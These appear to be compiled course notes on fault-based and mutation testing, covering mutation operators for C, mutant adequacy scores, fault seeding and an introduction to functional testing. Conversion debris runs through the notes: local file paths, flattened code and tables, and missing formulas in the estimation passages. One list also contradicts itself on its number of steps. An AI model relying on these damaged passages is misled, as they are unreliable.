Put another way, if the program under test has an actual fault, we may hypothesize that it differs from another, corrected program by only a small textual change. If so, then we need merely distinguish the program from all such small variants (by selecting test cases for which either the original or the variant program fails) to ensure detection of all such faults. This is known as the competent programmer hypothesis,an assumption that the program under test is "close to" (in the sense of textual difference) a correct program.

Some program faults are indeed simple typographical errors, and others that involve deeper errors of logic may nonetheless be manifest in simple textual differences. Sometimes, though, an error of logic will result in much more complex differences in program text. This may not invalidate fault-based testing with a simpler fault model, provided test cases sufficient for detecting the simpler faults are sufficient also for detecting the more complex fault. This is known as the coupling effect.

The coupling effect hypothesis may seem odd, but can be justified by appeal to a more plausible hypothesis about interaction of faults. A complex change is equivalent to several smaller changes in program text. If the effect of one of these small changes is not masked by the effect of others, then a test case that differentiates a variant based on a single change may also serve to detect the more complex error.

Fault-Based Testing: Terminology

Original program The program unit (e.g., C function or Java class) to be tested.

Program location A region in the source code. The precise definition is defined relative to the syntax of a particular programming language. Typical locations are statements, arithmetic and Boolean expressions, and procedure calls.

Alternate expression Source code text that can be legally substituted for the text at a program location. A substitution is legal if the resulting program is syntactically correct (i.e., it compiles without errors).

Alternate program A program obtained from the original program by substituting an alternate expression for the text at some program location.

Distinct behavior of an alternate program R for a test t The behavior of an alternate program R is distinct from the behavior of the original program P for a test t,if R and P produce a different result for t, or if the output of R is not defined for t.

Distinguished set of alternate programs for a test suite T A set of alternate programs are distinct if each alternate program in the set can be distinguished from the original program by at least one test in T.

Fault-based testing can guarantee fault detection only if the competent programmer hypothesis and the coupling effect hypothesis hold. But guarantees are more than we expect from other approaches to designing or evaluating test suites, including the structural and functional test adequacy criteria discussed in earlier chapters. Fault-based testing techniques can be useful even if we decline to take the leap of faith required to fully accept their underlying assumptions. What is essential is to recognize the dependence of these techniques, and any inferences about software quality based on fault-based testing, on the quality of the fault model. This also implies that developing better fault models, based on hard data about real faults rather than guesses, is a good investment of effort.

16.3 Mutation Analysis

Mutation analysis is the most common form of software fault-based testing. A fault model is used to produce hypothetical faulty programs by creating variants of the program under test. Variants are created by "seeding" faults, that is, by making a small change to the program under test following a pattern in the fault model. The patterns for changing program text are called mutation operators, and each variant program is called a mutant.

Mutation Analysis: Terminology

Original program under test The program or procedure (function) to be tested.

Mutant A program that differs from the original program for one syntactic element (e.g., a statement, a condition, a variable, a label).

Distinguished mutant A mutant that can be distinguished for the original program by executing at least one test case.

Equivalent mutant A mutant that cannot be distinguished from the original program.

Mutation operator A rule for producing a mutant program by syntactically modifying the original program.

Mutants should be plausible as faulty programs. Mutant programs that are rejected by a compiler, or that fail almost all tests, are not good models of the faults we seek to uncover with systematic testing.

We say a mutant is valid if it is syntactically correct. A mutant obtained from the program of Figure 16.1 by substituting while for switch in the statement at line 13 would not be valid, since it would result in a compile-time error. We say a mutant is useful if, in addition to being valid, its behavior differs from the behavior of the original program for no more than a small subset of program test cases. A mutant obtained by substituting 0 for 1000 in the statement at line 4 would be valid, but not useful, since the mutant would be distinguished from the program under test by all inputs and thus would not give any useful information on the effectiveness of a test suite. Defining mutation operators that produce valid and useful mutations is a nontrivial task.

1 2 /** Convert each line from standard input */ 3 void transduce() { 4 #define BUFLEN 1000 5 char buf[BUFLEN]; /* Accumulate line into this buffer */ 6 int pos=0; /* Index for next character in buffer */ 7 8 char inChar; /* Next character from input */ 9 10 int atCR = 0; /* 0="within line", 1="optional DOS LF" */ 11 12 while ((inChar = getchar()) != EOF ) { 13 switch (inChar) { 14 case LF: 15 if (atCR) { /* Optional DOS LF */ 16 atCR = 0; 17 } else { /* Encountered CR within line */ 18 emit(buf, pos); 19 pos=0; 20 } 21 break; 22 case CR: 23 emit(buf, pos); 24 pos=0; 25 atCR = 1; 26 break; 27 default:

mk:@MSITStore:D:%5Cstudy%5Ctextbooks%5CCP7026%20SOFTWARE%20QUALITY%20ASSURANCE%5C%5bMauro_Pezze,_Michal_Young%5d_Software_Testing_and_A(BookSee.org).chm::/final/BBL0110.html%23ch16fig01

28 if (pos >= BUFLEN-2) fail("Buffer overflow"); 29 buf[pos++] = inChar; 30 }/* switch */ 31 } 32 if (pos > 0) { 33 emit(buf, pos); 34 } 35 }

Figure 16.1: Program transduce converts line endings among Unix, DOS, and Macintosh conventions. The main procedure, which selects the output line end convention, and the output procedure emit are not shown.

Since mutants must be valid, mutation operators are syntactic patterns defined relative to particular programming languages. Figure 16.2 shows some mutation operators for the C language. Constraints are associated with mutation operators to guide selection of test cases likely to distinguish mutants from the original program. For example, the mutation operator svr (scalar variable replacement) can be applied only to variables of compatible type (to be valid), and a test case that distinguishes the mutant from the original program must execute the modified statement in a state in which the original variable and its substitute have different values.

ID Operator Description Constraint

Operand Modifications crp constant for constant

replacement replace constant C1 with constant C2 C1 ≠ C2

scr scalar for constant replacement

replace constant C with scalar variable X

C ≠ X

acr array for constant replacement

replace constant C with array reference A[I]

C ≠ A[I]

scr struct for constant replacement

replace constant C with struct field S C ≠ S

svr scalar variable replacement replace scalar variable X with a scalar variable Y

X ≠ Y

csr constant for scalar variable replacement

replace scalar variable X with a constant C

X ≠ C

asr array for scalar variable replacement

replace scalar variable X with an array reference A[I]

X ≠ A[I]

ssr struct for scalar replacement replace scalar variable X with struct field S

X ≠ S

vie scalar variable initialization elimination

remove initialization of a scalar variable

mk:@MSITStore:D:%5Cstudy%5Ctextbooks%5CCP7026%20SOFTWARE%20QUALITY%20ASSURANCE%5C%5bMauro_Pezze,_Michal_Young%5d_Software_Testing_and_A(BookSee.org).chm::/final/BBL0110.html%23ch1

ID Operator Description Constraint

car constant for array replacement

replace array reference A[I] with constant C

A[I]≠C

sar scalar for array replacement replace array reference A[I] with scalar variable X

A[I]≠C

cnr comparable array replacement

replace array reference with a comparable array reference

sar struct for array reference replacement

replace array reference A[I] with a struct field S

A[I]≠S

Expression Modifications abs absolute value insertion replace e by abs(e) e < 0 aor arithmetic operator

replacement replace arithmetic operator ψ with arithmetic operator φ

e1ψe2≠e1φe2

lcr logical connector replacement

replace logical connector ψ with logical connector φ

e1ψe2 ≠ e1φe2

ror relational operator replacement

replace relational operator ψ with relational operator φ

e1ψe2 ≠ e1φe2

uoi unary operator insertion insert unary operator cpr constant for predicate

replacement replace predicate with a constant value

Statement Modifications sdl statement deletion delete a statement sca switch case replacement replace the label of one case with

another

ses end block shift move } one statement earlier and later Figure 16.2: A sample set of mutation operators for the C language, with associated constraints to select test cases that distinguish generated mutants from the original program.

Many of the mutants of Figure 16.2 can be applied equally well to other procedural languages, but in general a mutation operator that produces valid and useful mutants for a given language may not apply to a different language or may produce invalid or useless mutants for another language. For example, a mutation operator that removes the "friend" keyword from the declaration of a C++ class would not be applicable to Java, which does not include friend classes.

16.4 Fault-Based Adequacy Criteria

Given a program and a test suite T, mutation analysis consists of the following steps:


Select mutation operators If we are interested in specific classes of faults, we may select a set of mutation operators relevant to those faults.

Generate mutants Mutants are generated mechanically by applying mutation operators to the original program.

Distinguish mutants Execute the original program and each generated mutant with the test cases in T . A mutant is killed when it can be distinguished from the original program.

Figure 16.3 shows a sample of mutants for program Transduce, obtained by applying the mutant operators in Figure 16.2. Test suite TS

ID Operator line Original/Mutant 1U 1D 2U 2D 2M End Long Mixed Mi ror 28 (pos >= BUFLEN–2)

(pos == BUFLEN–2) - - - - - - - -

Mj ror 32 (pos > 0) (pos >= 0)

- x x x x - - -

Mk sdl 16 atCR = 0 nothing - - - - - - - - Ml ssr 16 atCR = 0

pos = 0 - - - - - - - x

Test case

Description Test case

Description

1U One line, Unix line-end

2M Two lines, Mac line-end

1D One line, DOS line-end

End Last line not terminated with line-end sequence

2U Two lines, Unix line-end

Long Very long line (greater than buffer length)

2D Two lines, DOS line-end

Mixed Mix of DOS and Unix line ends in the same file

Figure 16.3: A sample set of mutants for program Transduce generated with mutation operators from Figure 16.2. x indicates the mutant is killed by the test case in the column head.

kills Mj, which can be distinguished from the original program by test cases 1D,2U, 2D, and 2M. Mutants Mi, Mk, and Ml are not distinguished from the original program by any test in TS. We say that mutants not killed by a test suite are live.


mk:@MSITStore:D:%5Cstudy%5Ctextbooks%5CCP7026%20SOFTWARE%20QUALITY%20ASSURANCE%5C%5bMauro_Pezze,_Michal_Young%5d_Software_Testing_and_A(BookSee.org).chm::/final/BBL0110.html%23604

mk:@MSITStore:D:%5Cstudy%5Ctextbooks%5CCP7026%20SOFTWARE%20QUALITY%20ASSURANCE%5C%5bMauro_Pezze,_Michal_Young%5d_Software_Testing_and_A(BookSee.org).chm::/final/BBL0110.html%23604

A mutant can remain live for two reasons:

• The mutant can be distinguished from the original program, but the test suite T does not contain a test case that distinguishes them (i.e., the test suite is not adequate with respect to the mutant).

• The mutant cannot be distinguished from the original program by any test case (i.e., the mutant is equivalent to the original program).

Given a set of mutants SM and a test suite T, the fraction of nonequivalent mutants killed by T measures the adequacy of T with respect to SM. Unfortunately, the problem of identifying equivalent mutants is undecidable in general, and we could err either by claiming that a mutant is equivalent to the program under test when it is not or by counting some equivalent mutants among the remaining live mutants.

The adequacy of the test suite TS evaluated with respect to the four mutants of Figure 16.3 is 25%. However, we can easily observe that mutant Mi is equivalent to the original program (i.e., no input would distinguish it). Conversely, mutants Mk and Ml seem to be nonequivalent to the original program: There should be at least one test case that distinguishes each of them from the original program. Thus the adequacy of TS, measured after eliminating the equivalent mutant Mi, is 33%.

Mutant Ml is killed by test case Mixed, which represents the unusual case of an input file containing both DOS- and Unix-terminated lines. We would expect that Mixed would also kill Mk, but this does not actually happen: Both Mk and the original program produce the same result for Mixed. This happens because both the mutant and the original program fail in the same way.[1] The use of a simple oracle for checking the correctness of the outputs (e.g., checking each output against an expected output) would reveal the fault. The test suite TS2 obtained by adding test case Mixed to TS would be 100% adequate (relative to this set of mutants) after removing the fault.

Mutation Analysis vs. Structural Testing

For typical sets of syntactic mutants, a mutation-adequate test suite will also be adequate with respect to simple structural criteria such as statement or branch coverage. Mutation adequacy can simulate and subsume a structural coverage criterion if the set of mutants can be killed only by satisfying the corresponding test coverage obligations.

Statement coverage can be simulated by applying the mutation operator sdl (statement deletion) to each statement of a program. To kill a mutant whose only difference from the program under test is the absence of statement S requires executing the mutant and the program under test with a test case that executes S in the original program. Thus to kill all mutants generated by applying the operator sdl to statements of the program under test, we need a test suite that causes the execution of each statement in the original program.




mk:@MSITStore:D:%5Cstudy%5Ctextbooks%5CCP7026%20SOFTWARE%20QUALITY%20ASSURANCE%5C%5bMauro_Pezze,_Michal_Young%5d_Software_Testing_and_A(BookSee.org).chm::/final/BBL0111.html%23ftn.ch1

Branch coverage can be simulated by applying the operator cpr (constant for predicate replacement) to all predicates of the program under test with constants True and False. To kill a mutant that differs from the program under test for a predicate P set to the constant value False, we need to execute the mutant and the program under test with a test case that causes the execution of the True branch of P. To kill a mutant that differs from the program under test for a predicate P set to the constant value True,we need to execute the mutant and the program under test with a test case that causes the execution of the False branch of P.

A test suite that satisfies a structural test adequacy criterion may or may not kill all the corresponding mutants. For example, a test suite that satisfies the statement coverage adequacy criterion might not kill an sdl mutant if the value computed at the statement does not affect the behavior of the program on some possible executions.

The program was in regular use by one of the authors and was believed to be correct. Discovery of the fault came as a surprise while using it as an example for this chapter.

16.5 Variations on Mutation Analysis

The mutation analysis process described in the preceding sections, which kills mutants based on the outputs produced by execution of test cases, is known as strong mutation. It can generate a number of mutants quadratic in the size of the program. Each mutant must be compiled and executed with each test case until it is killed. The time and space required for compiling all mutants and for executing all test cases for each mutant may be impractical.

The computational effort required for mutation analysis can be reduced by decreasing the number of mutants generated and the number of test cases to be executed. Weak mutation analysis decreases the number of tests to be executed by killing mutants when they produce a different intermediate state, rather than waiting for a difference in the final result or observable program behavior. weak mutation analysis

With weak mutation, a single program can be seeded with many faults. A "metamutant" program is divided into segments containing original and mutated source code, with a mechanism to select which segments to execute. Two copies of the meta-mutant are executed in tandem, one with only original program code selected and the other with a set of live mutants selected. Execution is paused after each segment to compare the program state of the two versions. If the state is equivalent, execution resumes with the next segment of original and mutated code. If the state differs, the mutant is marked as dead, and execution of original and mutated code is restarted with a new selection of live mutants.

Weak mutation testing does not decrease the number of program mutants that must be considered, but it does decrease the number of test executions and compilations. This

performance benefit has a cost in accuracy: Weak mutation analysis may "kill" a mutant even if the changed intermediate state would not have an effect on the final output or observable behavior of the program.

Like structural test adequacy criteria, mutation analysis can be used either to judge the thoroughness of a test suite or to guide selection of additional test cases. If one is designing test cases to kill particular mutants, then it may be important to have a complete set of mutants generated by a set of mutation operators. If, on the other hand, the goal is a statistical estimate of the extent to which a test suite distinguishes programs with seeded faults from the original program, then only a much smaller statistical sample of mutants is required. Aside from its limitation to assessment rather than creation statistical mutation analysis of test suites, the main limitation of statistical mutation analysis is that partial coverage is meaningful only to the extent that the generated mutants are a valid statistical model of occurrence frequencies of actual faults. To avoid reliance on this implausible assumption, the target coverage should be 100% of the sample; statistical sampling may keep the sample small enough to permit careful examination of equivalent mutants.

Estimating Population Sizes

Counting fish Lake Winnemunchie is inhabited by two kinds of fish, a native trout and an introduced species of chub. The Fish and Wildlife Service wishes to estimate the populations to evaluate their efforts to eradicate the chub without harming the population of native trout.

The population of chub can be estimated statistically as follows. 1000 chub are netted, their dorsal fins are marked by attaching a tag, then they are released back into the lake. Over the next weeks, fishermen are asked to report the number of tagged and untagged chub caught. If 50 tagged chub and 300 untagged chub are caught, we can calculate

and thus there are about 6000 untagged chub remaining in the lake.

It may be tempting to also ask fishermen to report the number of trout caught and to perform a similar calculation to estimate the ratio between chub and trout. However, this is valid only if trout and chub are equally easy to catch, or if one can adjust the ratio using a known model of trout and chub vulnerability to fishing.

Counting residual faults A similar procedure can be used to estimate the number of faults in a program: Seed a given number S of faults in the program. Test the program with some test suite and count the number of revealed faults. Measure the number of

seeded faults detected, DS, and also the number of natural faults DN detected. Estimate the total number of faults remaining in the program, assuming the test suite is as effective at finding natural faults as it is at finding seeded faults, using the formula

If we estimate the number of faults remaining in a program by determining the proportion of seeded faults detected, we must be wary of the pitfall of estimating trout population by counting chub. The seeded faults are chub, the real faults are trout, and we must either have good reason for believing the seeded faults are no easier to detect than real remaining faults, or else make adequate allowances for uncertainty. The difference is that we cannot avoid the problem by repeating the process with trout - once a fault has been detected, our knowledge of its presence cannot be erased. We depend, therefore, on a very good fault model, so that the chub are as representative as possible of trout. Of course, if we use special bait for chub, or design test cases to detect particular seeded faults, then statistical estimation of the total population of fish or errors cannot be justified.

Hardware Fault-based Testing

Fault-based testing is widely used for semiconductor and hardware system validation and evaluation both for evaluating the quality of test suites and for evaluating fault tolerance.

Semiconductor testing has conventionally been aimed at detecting random errors in fabrication, rather than design faults. Relatively simple fault models have been developed for testing semiconductor memory devices, the prototypical faults being "stuck- at-0" and "stuck-at-1" (a gate, cell, or pin that produces the same logical value regardless of inputs). A number of more complex fault models have been developed for particular kinds of semiconductor devices (e.g., failures of simultaneous access in dualport memories). A test vector (analogous to a test suite for software) can be judged by the number of hypothetical faults it can detect, as a fraction of all possible faults under the model.

Fabrication of a semiconductor device, or assembly of a hardware system, is more analogous to copying disk images than to programming. The closest analog of software is not the hardware device itself, but its design - in fact, a high-level design of a semiconductor device is essentially a program in a language that is compiled into silicon. Test and analysis of logic device designs faces the same problems as test and analysis of software, including the challenge of devising fault models. Hardware design

verification also faces the added problem that it is much more expensive to replace faulty devices that have been delivered to customers than to deliver software patches.

In evaluation of fault tolerance in hardware, the usual approach is to modify the state or behavior rather than the system under test. Due to a difference in terminology between hardware and software testing, the corruption of state or modification of behavior is called a "fault," and artificially introducing it is called "fault injection." Pin-level fault injection consists of forcing a stuck-at-0, a stuck-at-1, or an intermediate voltage level (a level that is neither a logical 0 nor a logical 1) on a pin of a semiconductor device. Heavy ion radiation is also used to inject random faults in a running system. A third approach, growing in importance as hardware complexity increases, uses software to modify the state of a running system or to simulate faults in a running simulation of hardware logic design.

Fault seeding can be used statistically in another way: To estimate the number of faults remaining in a program. Usually we know only the number of faults that have been detected, and not the number that remains. However, again to the extent that the fault model is a valid statistical model of actual fault occurrence, we can estimate that the ratio of actual faults found to those still remaining should be similar to the ratio of seeded faults found to those still remaining.

Once again, the necessary assumptions are troubling, and one would be unwise to place too much confidence in an estimate of remaining faults. Nonetheless, a prediction with known weaknesses is better than a seat-of-the-pants guess, and a set of estimates derived in different ways is probably the best one can hope for.

While the focus of this chapter is on fault-based testing of software, related techniques can be applied to whole systems (hardware and software together) to evaluate fault tolerance. Some aspects of fault-based testing of hardware are discussed in the sidebar on page 323.

Open Research Issues

Fault-based testing has yet to be widely applied in software development, although it is an important research tool for evaluating other test selection techniques. Its limited impact on software practice so far can be blamed perhaps partly on computational expense and partly on the lack of adequate support by industrial strength tools.

One promising direction in fault-based testing is development of fault models for particular classes of faults. These could result in more sharply focused fault-based techniques, and also partly address concerns about the extent to which the fault models conventionally used in mutation testing are representative of real faults. Two areas in

which researchers have attempted to develop focused models, expressed as sets of mutation operators, are component interfaces and concurrency constructs.

Particularly important is development of fault models based on actual, observed faults in software. These are almost certainly dependent on application domain and perhaps to some extent also vary across software development organizations, but too little empirical evidence is available on the degree of variability.

Mutation Testing Mutation testing (or Mutation analysis or Program mutation) is a method of software testing in which program or source code is deliberately manipulated, followed by suite of testing against the mutated code. The mutations introduced to source code are designed to imitate common programming errors. A good unit test suite typically detects the program mutations and fails automatically. Mutation testing is used on many different platforms, including Java, C++, C# and Ruby.

Mutation testing facilitates the following advantages:

• Program code fault identification • Effective test case development • Detection of loopholes in test data • Improved software program quality • Elimination of code ambiguity

Disadvantages of mutation testing include:

• Difficult implementation of complex mutations • Expensive and time-consuming • Requires skilled testers with programming knowledge

Mutation testing (or Mutation analysis or Program mutation) is used to design new software tests and evaluate the quality of existing software tests. Mutation testing involves modifying a program in small ways.[1] Each mutated version is called a mutant and tests detect and reject mutants by causing the behavior of the original version to differ from the mutant. This is called killing the mutant. Test suites are measured by the percentage of mutants that they kill. New tests can be designed to kill additional mutants. Mutants are based on well-defined mutation operators that either mimic typical programming errors (such as using the wrong operator or variable name) or force the creation of valuable tests (such as dividing each expression by zero). The purpose is to help the tester develop effective tests or locate weaknesses in the test data used for the program or in sections of the code that are seldom or never accessed during execution.

Goal

Tests can be created to verify the correctness of the implementation of a given software system, but the creation of tests still poses the question whether the tests are correct and sufficiently cover the requirements that have originated the implementation. (This

http://en.wikipedia.org/wiki/Mutation_testing%23cite_note-DLS1978-1

http://en.wikipedia.org/wiki/Execution_%28computers%29

technological problem is itself an instance of a deeper philosophical problem named "Quis custodiet ipsos custodes?" ["Who will guard the guards?"].) In this context, mutation testing was pioneered in the 1970s to locate and expose weaknesses in test suites. The theory was that if a mutant was introduced without the behavior (generally output) of the program being affected, this indicated either that the code that had been mutated was never executed (dead code) or that the test suite was unable to locate the faults represented by the mutant. For this to function at any scale, a large number of mutants usually are introduced into a large program, leading to the compilation and execution of an extremely large number of copies of the program. This problem of the expense of mutation testing had reduced its practical use as a method of software testing, but the increased use of object oriented programming languages and unit testing frameworks has led to the creation of mutation testing tools for many programming languages as a way to test individual portions of an application.

Mutation testing overview

Mutation testing is based on two hypotheses. The first is the competent programmer hypothesis. This hypothesis states that most software faults introduced by experienced programmers are due to small syntactic errors.[1] The second hypothesis is called the coupling effect. The coupling effect asserts that simple faults can cascade or couple to form other emergent faults.

Subtle and important faults are also revealed by higher-order mutants, which further support the coupling effect. Higher-order mutants are enabled by creating mutants with more than one mutation.

Mutation testing is done by selecting a set of mutation operators and then applying them to the source program one at a time for each applicable piece of the source code. The result of applying one mutation operator to the program is called a mutant. If the test suite is able to detect the change (i.e. one of the tests fails), then the mutant is said to be killed.

For example, consider the following C++ code fragment:

if (a && b) { c = 1; } else { c = 0; }

The condition mutation operator would replace && with || and produce the following mutant:

if (a || b) { c = 1; } else {

http://en.wikipedia.org/wiki/Quis_custodiet_ipsos_custodes%3F




http://en.wikipedia.org/wiki/Output_%28computing%29

http://en.wikipedia.org/wiki/Object_oriented_programming_language

http://en.wikipedia.org/wiki/Unit_testing



http://en.wikipedia.org/wiki/Mutation_testing%23cite_note-DLS1978-1

c = 0; }

Now, for the test to kill this mutant, the following three conditions should be met:

1. A test must reach the mutated statement. 2. Test input data should infect the program state by causing different program

states for the mutant and the original program. For example, a test with a = 1 and b = 0 would do this.

3. The incorrect program state (the value of 'c') must propagate to the program's output and be checked by the test.

These conditions are collectively called the RIP model.

Weak mutation testing (or weak mutation coverage) requires that only the first and second conditions are satisfied. Strong mutation testing requires that all three conditions are satisfied. Strong mutation is more powerful, since it ensures that the test suite can really catch the problems. Weak mutation is closely related to code coverage methods. It requires much less computing power to ensure that the test suite satisfies weak mutation testing than strong mutation testing.

However, there are cases where it is not possible to find a test case that could kill this mutant. The resulting program is behaviorally equivalent to the original one. Such mutants are called equivalent mutants.

Mutation operators

Many mutation operators have been explored by researchers. Here are some examples of mutation operators for imperative languages:

• Statement deletion • Statement duplication or insertion, e.g. goto fail; • Replacement of boolean subexpressions with true and false • Replacement of some arithmetic operations with others, e.g. + with *, - with / • Replacement of some boolean relations with others, e.g. > with >=, == and <= • Replacement of variables with others from the same scope (variable types must

be compatible)

mutation score = number of mutants killed / total number of mutants

These mutation operators are also called traditional mutation operators. There are also mutation operators for object-oriented languages, for concurrent constructions, complex objects like containers, etc. Operators for containers are called class-level mutation operators. For example the muJava tool offers various class-level mutation operators such as Access Modifier Change, Type Cast Operator Insertion, and Type Cast

http://en.wikipedia.org/wiki/Code_coverage

Operator Deletion. Mutation operators have also been developed to perform security vulnerability testing of programs

What is Mutation Testing

Introduction

As the demand for software grows, so is the complexity of the design. The more complex a software is, the higher will be the testing needs, quality assurance and customer satisfaction. Although testing is, an integral part of the software development process the issue is still on what is sufficient or adequate testing still open.

If your tests cannot find a bug, can you believe that there are no bugs? Is it possible to trust your unit tests? Can you ascertain that they are telling truth for you? How does it work out to assess your tests? Mutation test is one of those wonderful tests that allow you to assess the tests. Mutation test involves deliberately altering, modifying or changing a program code, later rerunning a suit of correct unit tests against the mutated program.

In nutshell, mutation test works in the following manner. Initially, you will need to start the test with a piece of production code that the unit tests cover in the right way. Once you ascertain that all tests pass for a given code, and then you can start applying mutation to the target assembly.

Testing means additional cost and less productivity. For optimum development processing, there is a great need for the continuous improvement of quality testing methods. Testing coverage is an important issue in software development. Testing coverage is how well you test the software. The question is when do you stop testing? What is “adequate” testing? Right now, the most common practice is to state the requirement of percentage coverage like “a minimum xyz% coverage”. You will need to balance various requirements to bring about quality and customer satisfaction against productivity and cost.

Another important question to consider is, “How extensive are the testing programs?” What is the assurance for the “xyz% coverage” claim? What determines that at least “xyz%” of all possible causes of errors, bugs or failures is covered by the existing testing methods? Mutation testing is one way to verify if the software tester performed the testing in a proper manner. Through mutation testing, it can be determined, if the set of testing methods used in the developing process were appropriate and adequate to ensure product quality.

What is Mutation Testing?

To determine the correctness of a testing program, you will need to observe the behavior for each test case. If there are no detected faults, then the program is correct

or it passes the test. A test case is the set of input values to the program under test and the corresponding output values.

Mutation testing is a method or strategy to check the effectiveness or accuracy of a testing program to detect the fault in the system or program under test. The test is called so because mutants of the software are created and run with the test cases.

Experts also call mutation testing as fault-based testing strategy because the mutants are created by introducing a single fault into the original program. You can set any number of mutants into the system. There are other versions of mutation testing, but they rely on the same method – to mutate the original software.

Some of the other versions are weak mutation, interface mutation and specification based mutation. Mutation testing is not a new method, developers know about it since the late 1970s. However, researchers have been using it in the educational institutions than in the industrial software domain.

Mutation Testing Procedure

The following steps rely on the traditional mutation process:

Create mutant software

The system /program under test are modified by rewriting the source code to introduce a single fault. The new versions of the system/program are mutants of the original ones. Each mutant has one fault, different from the original software and the other mutants. The tester may create as many mutants as needed. There is no limit.

Prepare test cases for input to the original and mutant software

The test cases should plan for the detection of the fault introduced into the mutant software. The tester may improve on the test cases, if necessary, so that the fault in the mutant software is found.

Apply test cases to original software

In the original software, the output is supposed to be correct, or must be similar as the expected output. If not, then there would be an error in the application, which must be fixed. Apply the test cases again until there are no bugs.

Apply test cases to mutant software

After testing the original software, apply the same test cases to the mutant software. If the output is different from the output in the original software, you will need to label the mutant as Dead. Continue to apply the other test cases to the mutant software and record the results. Dead mutants are no longer tested with the rest of the test set.

Compute mutation score

Mutation score is the ratio of the number of Dead Mutants over the number of Non Equivalent Mutants. The goal is to have a sore of one (1), which means that all faults in all mutants have been detected; the more dead mutants the higher the score will be.

Mutation Analysis of Result

The interpretation of the testing result is discussed below (Mutation Score Analysis)

Mutation Score Analysis

Using the mutation score formula, if you find that the test score is below one (1), then you should be able to analyze the data, because they are indicators of the status of the testing performed.

Following are ways to interpret the indicators -

The mutation testing result can be used as reference for the test case or test suite effectiveness. The mutation test score is directly proportional to the effectiveness of the test cases or test suite. If the score is close to or almost one, it is an indicator that the fault in a high percentage of mutants was detected. Equivalent Mutants produce similar outputs as the original program and so they cannot be dead. Take note that they are not included in the mutation score formula.

The live or equivalent mutants are indicators that the test cases are not adequate and hence need further improvements. Probably, the test did not test the code where the fault is. The tester should investigate and make a new test case if necessary. After improving on the test cases, the tester may repeat the procedure until a satisfactory mutation score is attained. The testing group management defines a satisfactory mutation score.

The mutation score could also be a good reference point on testing the effectiveness of the measures employed to improve the testing cases or suite. Mutation testing does not pass or fail the program under test. It just gives indicators to guide the testers on the improvements that need to be implementation.

Mutation testing will empower your software testing process with trust and fidelity. This will eventually help you to create a software application that can pass all other test procedures.

Mutation Testing Advantages and Disadvantages

Mutation testing helps tester to assess the quality of a test suite. This is possible by mutating certain elements of software in your source code and later checking and

detecting if the test code is able to find the invisible errors. However, mutation testing is very costly to run, especially on very large and voluminous software applications.

Mutation testing is also a powerful tool to detect testing inadequacies or to check coverage on testing software. Software testers have known this method for many years. However, not many of them are using it for various reasons. There are several reasons that impede software industry from using this testing. However, this testing has its own share of advantages and disadvantages. Few of them are listed here below:

Advantages

• A powerful tool to determine the coverage of testing programs. • Many steps used in this software are automated, like the creation of mutant software and the white box method for unit testing. • It is capable of comprehensive testing of correctly chosen mutant programs.

Disadvantages

• You can create any number of mutants and the testing of these mutants is always costly and time consuming. • It requires many test cases to distinguish the mutant from the original software. • It also requires a lot of testing before a dependable data is obtained. • It needs an automated tool to reduce testing time. • It is not an applicable method for black box testing. • It is very complicated to use without an automated tool.

The list of disadvantages mentioned above are the reasons why mutation testing has not really spread its usability outside of research. The following are what software developers want in relation to the future of mutation testing.

Automation of Mutation Testing

As mentioned earlier, mutation is complicated and requires numerous testing to have the needed data. Unlike in research where mutation testing has been used for decades, there are stiff delivery dates and compelling cost targets to meet.

Requirement for more researchers and users of the testing process is always a predominant factor. More numbers of users means there will be higher number of new developments and observations which can improve the usability of the program.

To get reliable results, you need to find better methods that can find equivalent mutants and reduce the number of tests. More equivalent numbers of mutants means longer testing time duration.

Conclusion

Mutation testing is a misnomer. It is not just a testing method; it is more of an analytical method. Based on the set guidelines, the tester analyzes the results and implements the appropriate corrective measures.

Unlike the other testing methods, there is no Pass/ Fail disposition if the output fails to meet the standard output as defined in the test cases. Instead, adjustments are made to improve whatever was lacking or not up to standard, then test again until a satisfactory score is attained.

In real life, a 100% average testing effectiveness is not attainable, 100% can be achieved for a day or two, but not for several days, and certainly not on the average for weeks or months.

It is also an effective program for improving the quality of testing software but its widespread use is prevented by the difficulties encountered in using them. It would be very helpful to the developers of complex software if the testing methods could be improved to a point that it is not only effective in fault detection but also efficient as well.

UNIT V - FUNCTIONAL TESTING

Introduction

Functional testing is a quality assurance (QA) process and a type of black box testing that bases its test cases on the specifications of the software component under test. Functions are tested by feeding them input and examining the output, and internal program structure is rarely considered (not like in white-box testing). Functional Testing usually describes what the system does.

Functional testing differs from system testing in that functional testing "verifies a program by checking it against ... design document(s) or specification(s)", while system testing "validate[s] a program by checking it against the published user or system requirements" Functional Testing have many types:

• Smoke Testing • Sanity Testing • Regression Testing • Usability Testing

Six steps

Functional testing typically involves five steps

1. The identification of functions that the software is expected to perform 2. The creation of input data based on the function's specifications 3. The determination of output based on the function's specifications 4. The execution of the test case 5. The comparison of actual and expected outputs 6. To check whether the application works as per the customer need.

In functional testing basically the testing of the functions of component or system is done. It refers to activities that verify a specific action or function of the code. Functional test tends to answer the questions like “can the user do this” or “does this particular feature work”. This is typically described in a requirements specification or in a functional specification.

http://en.wikipedia.org/wiki/Quality_assurance

http://en.wikipedia.org/wiki/Black_box_testing

http://en.wikipedia.org/wiki/White-box_testing

http://en.wikipedia.org/wiki/System_testing

http://en.wikipedia.org/wiki/Verification_and_validation_%28software%29

http://en.wikipedia.org/wiki/Verification_and_validation_%28software%29

The techniques used for functional testing are often specification-based. Testing functionality can be done from two perspective:

• Requirement-based testing: In this type of testing the requirements are prioritized depending on the risk criteria and accordingly the tests are prioritized. This will ensure that the most important and most critical tests are included in the testing effort.

• Business-process-based testing: In this type of testing the scenarios involved in the day-to-day business use of the system are described. It uses the knowledge of the business processes. For example, a personal and payroll system may have the business process along the lines of: someone joins the company, employee is paid on the regular basis and employee finally leaves the company.

DEFINITION

Functional Testing is a type of software testing whereby the system is tested against the functional requirements/specifications.

ELABORATION

Functions (or features) are tested by feeding them input and examining the output. Functional testing ensures that the requirements are properly satisfied by the application. This type of testing is not concerned with how processing occurs, but rather, with the results of processing.

During functional testing, Black Box Testing technique is used in which the internal logic of the system being tested is not known to the tester.

Functional testing is normally performed during the levels of System Testing and Acceptance Testing.

Typically, functional testing involves the following steps:

• Identify functions that the software is expected to perform. • Create input data based on the function’s specifications. • Determine the output based on the function’s specifications. • Execute the test case. • Compare the actual and expected outputs.

ADVANTAGES

• It simulates actual system usage. • It does not make any system structure assumptions.

http://softwaretestingfundamentals.com/black-box-testing/

http://softwaretestingfundamentals.com/system-testing/

http://softwaretestingfundamentals.com/acceptance-testing/

http://softwaretestingfundamentals.com/test-case/

DISADVANTAGES

